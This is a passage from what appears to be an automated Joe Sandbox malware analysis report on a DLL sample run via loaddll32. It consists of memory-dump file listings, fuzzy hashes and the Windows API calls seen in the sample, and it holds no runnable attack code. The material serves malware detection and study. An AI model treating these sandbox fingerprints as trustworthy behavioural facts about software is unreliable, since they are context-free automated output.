                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Exception@8H_prologThrowstd::bad_exception::bad_exceptionstd::exception::exception
                              • String ID: bad cast
                              • API String ID: 3308202294-3145022300
                              • Opcode ID: f19d5a6add88c63bfc4e486304a3a9c0b2fca9bab03100022b0765298627886e
                              • Instruction ID: 90532898367348816e5fdac504d4f52e943ab012dcc6916943c3cb77f87acb0b
                              • Opcode Fuzzy Hash: f19d5a6add88c63bfc4e486304a3a9c0b2fca9bab03100022b0765298627886e
                              • Instruction Fuzzy Hash: EFF0A0769005089BC705CF94D441AEAF779EF46325F2145AEED099BB10CB72AA4ACBE0
                              APIs
                              • TlsAlloc.KERNEL32(?,?,?,?,6CEB118F,?,6CEDE69C,000000FF), ref: 6CEB1D05
                              • GetLastError.KERNEL32(?,?,?,?,6CEB118F,?,6CEDE69C,000000FF), ref: 6CEB1D12
                                • Part of subcall function 6CEB1A0E: __EH_prolog.LIBCMT ref: 6CEB1A13
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocErrorH_prologLast
                              • String ID: tss
                              • API String ID: 249634027-1638339373
                              • Opcode ID: 00a3edf02472045ad3f30620154ff3a4a7126025b237b7b1d07368c570594ad9
                              • Instruction ID: 54bd5fb116e32a5e54370bab404052ae7e403e230ae10a72bd9253b58e4e8877
                              • Opcode Fuzzy Hash: 00a3edf02472045ad3f30620154ff3a4a7126025b237b7b1d07368c570594ad9
                              • Instruction Fuzzy Hash: CEE0CD71E011149B8B40ABF4D9094DEBB78DB052B5B200769FC11A3780FF709D0497D1
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB4494
                              • std::bad_exception::bad_exception.LIBCMT ref: 6CEB44A9
                                • Part of subcall function 6CECAC27: std::exception::exception.LIBCMT ref: 6CECAC31
                                • Part of subcall function 6CEBEC65: __CxxThrowException@8.LIBCMT ref: 6CEBECBB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Exception@8H_prologThrowstd::bad_exception::bad_exceptionstd::exception::exception
                              • String ID: bad cast
                              • API String ID: 3308202294-3145022300
                              • Opcode ID: 7607248fa7aef9d1a4c375a270dead30ea3e09cb26029e53eeef69f5df6a03e7
                              • Instruction ID: 94fcbe8f8addc7ef11c4aade0c3e258a4dcce1b75f8f682c1f81b6d807e35524
                              • Opcode Fuzzy Hash: 7607248fa7aef9d1a4c375a270dead30ea3e09cb26029e53eeef69f5df6a03e7
                              • Instruction Fuzzy Hash: 33E09A719005489BC705CFA0C246BEDB7B4EB04308F2085ADA80697B90CB34AA5ACA91
                              APIs
                              • WSAGetLastError.WS2_32(00000000,?,?,?,6CEB3747,00000000), ref: 6CEBE8C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast
                              • String ID: G7l$G7l
                              • API String ID: 1452528299-901467417
                              • Opcode ID: a3d396eba2968d91adc38ff45253fbb724321b6de019e6490b7b895d4d515779
                              • Instruction ID: f0c93d727757836875eb9f3e72dee56ba6f1da392b740e38d95b6b6c1fed4e89
                              • Opcode Fuzzy Hash: a3d396eba2968d91adc38ff45253fbb724321b6de019e6490b7b895d4d515779
                              • Instruction Fuzzy Hash: 95E0ECB4504208AFC708DF94D944CAABBB8EB09210B008299FC099B311DB31E940CB90